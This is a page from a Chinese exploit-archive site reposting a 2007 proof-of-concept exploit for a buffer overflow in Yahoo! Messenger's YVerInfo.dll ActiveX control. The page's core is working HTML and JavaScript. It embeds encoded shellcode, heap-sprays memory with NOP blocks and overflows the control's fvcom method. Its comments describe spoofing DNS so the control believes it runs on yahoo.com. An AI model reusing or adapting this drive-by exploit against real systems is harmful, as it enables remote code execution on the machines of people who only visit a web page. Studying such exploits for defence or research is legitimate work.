首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX BoF Exploit 来源：minhbq1985@gmail.com 作者：minhbq 发布时间：2007-09-03   <!-- Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX Control Buffer Overflows update YM : http://messenger.yahoo.com/security_update.php?id=082907 Functions : fvcom or info; RegKey Safe for Script: True RegKey Safe for Init: True -> that functions are safely scriptable and exploitable by HeapSpray Technique Tested : Windows XP Professional SP2 all patched,Internet Explorer 7 That functions within this class can only be called if the control believes it is being run from the yahoo.com domain. -> I used "Simple DNS Plus" for manipulating the DNS resolution. I saved this file (exploit.htm) into directory root (web server) and I exploited with link : http://www.yahoo.com/exploit.htm coder : minhbq mail : minhbq1985@gmail.com --> <html> <!-- CLSID of YverInfo.dll --> <object classid="CLSID:D5184A39-CBDF-4A4F-AC1A-7A45A852C883" id="target"></OBJECT> <SCRIPT language="javascript"> // HeapSpray - execute calculator shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");    bigblock = unescape("%u9090%u9090");        headersize = 20;        slackspace = headersize+shellcode.length     while (bigblock.length<slackspace) bigblock+=bigblock;     fillblock = bigblock.substring(0, slackspace);     block = bigblock.substring(0, bigblock.length-slackspace);     while(block.length+slackspace<0x40000) block = block+block+fillblock;    memory = new Array();     for (i=0;i<800;i++) memory[i] = block + shellcode; var buffer =  unescape("%0D"); while (buffer.length< 10000) buffer+=unescape("%0D"); // Vulnerability of method fvcom target.fvcom(buffer); </script> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Joomla! 1.5 Beta1/Beta2/RC1 Re ·OTSTurntables 1.00 (m3u File) ·CKGold Shopping Cart 2.0 (cate ·Apple Quicktime < 7.2 SMIL Rem ·PPStream (PowerPlayer.dll 2.0. ·CCProxy <= v6.2 Telnet Proxy P ·Wireshark < 0.99.5 DNP3 Dissec ·Microsoft Visual Basic 6.0 VBP ·phpBB Links MOD 1.2.2 Remote S ·AtomixMP3 2.3 (pls File) Local ·Norman Virus Control nvcoaft51 ·GlobalLink 2.7.0.8 glItemCom.d   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved